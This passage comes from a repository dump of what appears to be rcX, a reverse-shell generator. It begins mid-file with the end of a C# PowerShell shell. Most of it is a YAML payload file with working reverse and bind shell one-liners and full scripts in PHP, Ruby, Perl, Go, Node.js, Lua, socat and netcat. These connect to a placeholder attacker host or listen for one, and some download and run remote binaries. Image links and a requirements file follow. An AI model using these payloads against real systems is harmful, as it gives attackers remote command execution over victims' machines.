DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}
141 |       "@;Add-Type -TypeDefinition $d -Language CSharp;iex "[i$j]::Main()"
142 |   php:
143 |     php-exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});exec(''{shell_path}
144 |       <&3 >&3 2>&3'');"'
145 |     php-shell_exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});shell_exec(''{shell_path}
146 |       <&3 >&3 2>&3'');"'
147 |     php-system: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});system(''{shell_path}
148 |       -i <&3 >&3 2>&3'');"'
149 |     php-passthru: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});passthru(''{shell_path}
150 |       -i <&3 >&3 2>&3'');"'
151 |     php-popen: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});popen(''{shell_path}
152 |       -i <&3 >&3 2>&3",''r'');"'
153 |     php-proc_open: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});$proc=proc_open(''{shell_path}'',array(0=>$sock,1=>$sock,2=>$sock),$pipes);"'
154 |     php-backtick: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});`{shell_path}
155 |       <&3 >&3 2>&3`;"'
156 |     php-code: '<?php class S{{private $addr=null;private $port=null;private $os=null;private
157 |       $s=null;private $descriptorspec=array(0=>array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private
158 |       $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private
159 |       function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else
160 |       if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return
161 |       $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else
162 |       if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return
163 |       $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private
164 |       function dump($data){{$data=str_replace(''<'',''&lt;'',$data);$data=str_replace(''>'',''&gt;'',$data);}}private
165 |       function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return
166 |       $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return
167 |       $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private
168 |       function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public
169 |       function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}:
170 |       {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes
171 |       as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else
172 |       if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else
173 |       if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else
174 |       if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes
175 |       as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new
176 |       S(''{host}'',{port});$sh->run();unset($sh);?>'
177 |   php-windows:
178 |     php: 'echo "<?php class S{{private $addr=null;private $port=null;private $os=null;private
179 |       $s=null;private $descriptorspec=array(0=>array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private
180 |       $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private
181 |       function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else
182 |       if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return
183 |       $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else
184 |       if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return
185 |       $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private
186 |       function dump($data){{$data=str_replace(''<'',''&lt;'',$data);$data=str_replace(''>'',''&gt;'',$data);}}private
187 |       function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return
188 |       $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return
189 |       $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private
190 |       function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public
191 |       function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}:
192 |       {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes
193 |       as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else
194 |       if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else
195 |       if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else
196 |       if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes
197 |       as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new
198 |       S(''{host}'',{port});$sh->run();unset($sh);?>"|{binary_name}'
199 |   ruby-linux:
200 |     ruby-spawn: '{binary_name} -rsocket -e"spawn(''{shell_path}'',[:in,:out,:err]=>TCPSocket.new(''{host}'',{port}))"'
201 |     ruby-sprintf: '{binary_name} -rsocket -e"f=TCPSocket.open(''{host}'',{port}).to_i;exec
202 |       sprintf(''{shell_path} -i <&%d >&%d 2>&%d'',f,f,f)"'
203 |     ruby-new: '{binary_name} -rsocket -e "exit if fork;c=TCPSocket.new(''{host}'',{port});loop{{c.gets.chomp!;(exit!
204 |       if $_==''exit'');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print
205 |       io.read}}))rescue c.puts ''failed: #{{$_}}''}}"'
206 |     ruby-windows: '{binary_name} -rsocket -e "c=TCPSocket.new(''{host}'',''{port}'');while(cmd=c.gets);IO.popen({shell_path},''r''){{|io|c.print
207 |       io.read}}end"'
208 |   socat:
209 |     socat: "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}"
210 |     socat-tty: "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane"
211 |     socat-linux: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
212 |       -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane
213 |       {protocol}:{host}:{port}
214 |   golang-linux:
215 |     golang: echo 'package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go
216 |       &&{binary_name} run /tmp/t.go&&rm /tmp/t.go
217 |   golang-windows:
218 |     golang: echo package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\0.go&{binary_name}
219 |       run %tmp%\0.go&del %tmp%\0.go %tmp%\0
220 |   perl-linux:
221 |     perl: '{binary_name} -e ''use Socket;$i="{host}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("{shell_path}
222 |       -i");}};'''
223 |     perl-2: '{binary_name} -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{host}:{port}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_
224 |       while<>;'''
225 |   perl-windows:
226 |     perl: '{binary_name} -e "use Socket;$i=''{host}'';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,''>&S'');open(STDOUT,''>&S'');open(STDERR,''>&S'');exec(''{shell_path}'');}};"'
227 |     perl-2: '{binary_name} -MIO -e "$c=new IO::Socket::INET(PeerAddr,''{host}:{port}'');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_
228 |       while<>;"'
229 |   java:
230 |     java-jar: "{binary_name} -jar Reverse_Shell.jar {host} {port}"
231 |     java-jar-github: wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar
232 |       -O 0&&java -jar 0 {host} {port}&&del 0||rm 0
233 |     java-jar3: "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java"
234 |     java-jsp: https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp
235 |     java-jsp2: https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp
236 |     java-jsp-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port}
237 |       -f raw>reverse.jsp
238 |     java-war-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port}
239 |       -f war>reverse.war
240 |   nodejs-linux:
241 |     nodejs-async: echo 'require("child_process").exec("{shell_path} -i >& /dev/tcp/{host}/{port}
242 |       0>&1")'|{binary_name}
243 |     nodejs-sync: echo 'require("child_process").execSync("{shell_path} -i >& /dev/tcp/{host}/{port}
244 |       0>&1")'|{binary_name}
245 |     nodejs-spawn: echo '!function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new
246 |       e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name}
247 |   nodejs-windows:
248 |     nodejs-async: echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name}
249 |     nodejs-sync: echo require('child_process').execSync('nc -e {shell_path} {host}
250 |       {port}')|{binary_name}
251 |     nodejs-spawn: echo !function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new
252 |       e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name}
253 |   lua:
254 |     lua5.1: lua5.1 -e 'local host, port = "{host}", {port} local socket = require("socket")
255 |       local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while
256 |       true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r")
257 |       local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break
258 |       end end tcp:close()'
259 |     lua-linux: '{binary_name} -e "require(''socket'');require(''os'');t=socket.tcp();t:connect(''{host}'',''{port}'');os.execute(''{shell_path}
260 |       -i <&3 >&3 2>&3'');"'
261 |   custom_payload_type:
262 |     custom_payload_name: custom_payload_value
263 | bind:
264 |   bash:
265 |     bash-bind: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port}
266 |       >/tmp/m
267 |   netcat:
268 |     nc: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m
269 |     nc-e: "{binary_name} -Lnp {port} -e {shell_path}{nc_args}"
270 |     ncat-e: ncat -lnp {port} -e {shell_path}{ncat_args}
271 |     ncat-ssl: ncat -lnp {port} -e {shell_path} --ssl
272 |     DotnetCat: dncat -lp {port} -e {shell_path}
273 |   socat:
274 |     socat: "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}"
275 |     socat-ssl: "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}"
276 |   python:
277 |     python-bind: '{binary_name} -c "import subprocess as u;c=__import__(''socket'').socket();c.bind((''{host}'',{port}));c.listen(0);cc,a=c.accept();p=u.Popen([''{shell_path}''],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__(''threading'').Thread(target=lambda:[cc.send(p.stdout.read(1024))
278 |       for _ in iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if
279 |       p.stdin.write(cc.recv(1024))]"'
280 |     pwncat: pwncat -l {host} {port} -e {shell_path}{pwncat_args}
281 |   perl-linux:
282 |     perl-bind: '{binary_name} -e ''use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close
283 |       C){{open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("{shell_path}
284 |       -i");}};'''
285 |   perl-windows:
286 |     perl-bind: '{binary_name} -e "use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close
287 |       C){{open(STDIN,''>&C'');open(STDOUT,''>&C'');open(STDERR,''>&C'');exec(''{shell_path}'');}};"'
288 |   golang:
289 |     gotty-webshell: gotty {gotty_args}-w --reconnect {shell_path}
290 |   custom_payload_type:
291 |     custom_payload_name: custom_payload_value
292 | 


--------------------------------------------------------------------------------
/rcX-png/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/favicon.ico


--------------------------------------------------------------------------------
/rcX-png/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/logo.png


--------------------------------------------------------------------------------
/rcX-png/rcx-main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-main.png


--------------------------------------------------------------------------------
/rcX-png/rcx-obf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-obf.png


--------------------------------------------------------------------------------
/rcX-png/rcx-online-curl.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-online-curl.gif


--------------------------------------------------------------------------------
/rcX-png/rcx-staged.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-staged.png


--------------------------------------------------------------------------------
/rcX-png/rcx-table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-table.png


--------------------------------------------------------------------------------
/rcX-png/rcx-web-cli.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-web-cli.png


--------------------------------------------------------------------------------
/rcX-png/rcxonline.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcxonline.gif


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests~=2.27.1
2 | Flask~=2.0.2
3 | prettytable~=3.0.0
4 | pyngrok~=5.1.0


--------------------------------------------------------------------------------